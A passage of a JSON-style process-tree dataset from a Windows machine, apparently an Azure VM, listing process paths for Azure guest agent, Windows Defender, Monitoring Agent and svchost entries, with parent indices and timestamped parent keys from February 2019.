901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\"],\"parent_index\":[\"NaN\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"170\",\"173\",\"170\",\"177\",\"177\",\"170\",\"179\",\"170\",\"183\",\"170\",\"185\",\"185\",\"170\",\"192\",\"170\",\"194\",\"170\",\"196\",\"170\",\"206\",\"170\",\"231\",\"170\",\"302\",\"170\",\"304\",\"304\",\"304\",\"170\",\"341\",\"170\",\"347\",\"170\",\"351\",\"170\",\"353\",\"170\",\"357\",\"170\",\"361\",\"170\",\"370\",\"170\",\"372\",\"170\",\"378\",\"170\",\"380\",\"170\",\"417\",\"170\",\"442\",\"170\",\"488\",\"170\",\"495\",\"170\",\"506\",\"170\",\"508\",\"170\",\"510\",\"170\",\"515\",\"170\",\"522\",\"170\",\"524\",\"170\",\"528\",\"170\",\"533\",\"170\",\"541\",\"170\",\"575\",\"170\",\"600\",\"170\",\"631\",\"170\",\"633\",\"170\",\"636\",\"170\",\"638\",\"170\",\"644\",\"170\",\"645\",\"170\",\"651\",\"170\",\"653\",\"170\",\"659\",\"170\",\"665\",\"170\",\"679\",\"170\",\"725\",\"170\",\"754\",\"170\",\"760\",\"170\",\"765\",\"170\",\"767\",\"170\",\"769\",\"170\",\"775\",\"170\",\"781\",\"170\",\"783\",\"170\",\"786\",\"170\",\"795\",\"170\",\"799\",\"170\",\"826\",\"170\",\"853\",\"170\",\"891\",\"170\",\"892\",\"170\",\"900\",\"170\",\"902\",\"170\",\"906\",\"170\",\"908\",\"170\",\"917\",\"170\",\"919\",\"170\",\"921\",\"170\",\"924\",\"170\",\"942\",\"170\",\"943\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"NaN\",\"1001\",\"1\",\"NaN\",\"1002\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"151\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"163\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"152\",\"152\",\"152\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"247\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"256\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"289\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"1002\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"1002\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"33\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"1002\",\"1002\",\"1002\",\"355\",\"1002\",\"1002\",\"1002\",\"1002\",\"375\",\"1002\",\"1002\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"398\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"433\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"444\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"1002\",\"490\",\"490\",\"493\",\"1002\",\"1002\",\"500\",\"1002\",\"512\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"552\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"587\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"1002\",\"1002\",\"1002\",\"1002\",\"663\",\"1002\",\"1002\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"681\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"714\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"811\",\"812\",\"812\",\"812\",\"812\",\"812\",\"817\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"827\",\"812\",\"812\",\"812\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"848\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"1002\",\"1002\",\"1002\",\"904\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"962\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"NaN\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"NaN\",\"1004\",\"10\",\"1004\",\"107\",\"1004\",\"120\",\"1004\",\"127\",\"1004\",\"129\",\"1004\",\"139\",\"1004\",\"15\",\"1004\",\"5\",\"1004\",\"67\",\"1004\",\"76\",\"1004\",\"78\",\"1004\",\"8\",\"NaN\",\"1005\",\"12\",\"NaN\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"NaN\",\"1007\",\"103\",\"103\",\"105\",\"1007\",\"123\",\"1007\",\"134\",\"134\",\"136\",\"1007\",\"343\",\"343\",\"349\",\"1007\",\"364\",\"364\",\"366\",\"1007\",\"385\",\"385\",\"387\",\"1007\",\"502\",\"502\",\"504\",\"1007\",\"520\",\"520\",\"526\",\"1007\",\"530\",\"1007\",\"594\",\"594\",\"620\",\"1007\",\"640\",\"640\",\"642\",\"1007\",\"655\",\"655\",\"657\",\"1007\",\"69\",\"69\",\"74\",\"1007\",\"756\",\"756\",\"758\",\"1007\",\"771\",\"771\",\"773\",\"1007\",\"788\",\"1007\",\"791\",\"791\",\"793\",\"1007\",\"889\",\"889\",\"895\",\"1007\",\"910\",\"910\",\"912\",\"1007\",\"926\",\"926\",\"928\",\"NaN\",\"1008\",\"81\",\"81\",\"84\",\"97\",\"1008\",\"83\",\"83\",\"1008\",\"85\",\"1008\",\"1008\",\"94\",\"94\",\"NaN\",\"1009\",\"1009\",\"1009\",\"89\",\"90\",\"1009\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe0x8f02019-02-10 00:45:28.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe0x11582019-02-10 00:45:30.153000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe0x11582019-02-10 00:45:30.153000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\lodctr.exe0x20b42019-02-10 00:45:30.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22c02019-02-10 00:45:30.653000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1af02019-02-10 00:45:30.720000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1af02019-02-10 00:45:30.720000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6442019-02-10 00:45:36.180000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12902019-02-10 00:45:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22742019-02-10 00:45:38.023000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x91c2019-02-10 00:46:28.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf102019-02-10 00:48:32.793000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe0x1a002019-02-10 00:57:36.083000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12f82019-02-10 01:15:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe0xbd82019-02-10 01:30:36.103000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 01:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x8c42019-02-10 01:48:32.220000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb102019-02-10 02:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17e02019-02-10 02:25:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15b82019-02-10 02:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xec02019-02-10 02:48:32.223000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xdd02019-02-10 03:15:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x22dc2019-02-10 03:15:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8382019-02-10 03:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xe2c2019-02-10 03:48:32.237000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e02019-02-10 04:05:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1c842019-02-10 04:15:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1b642019-02-10 04:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x6902019-02-10 04:48:32.243000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1c202019-02-10 04:55:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12802019-02-10 05:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 05:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15842019-02-10 05:45:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x4902019-02-10 05:48:32.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xfc02019-02-10 06:15:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa142019-02-10 06:35:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1ce42019-02-10 06:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xcc82019-02-10 06:48:32.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8f82019-02-10 07:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16142019-02-10 07:25:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18502019-02-10 07:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x16102019-02-10 07:48:32.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10802019-02-10 08:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service 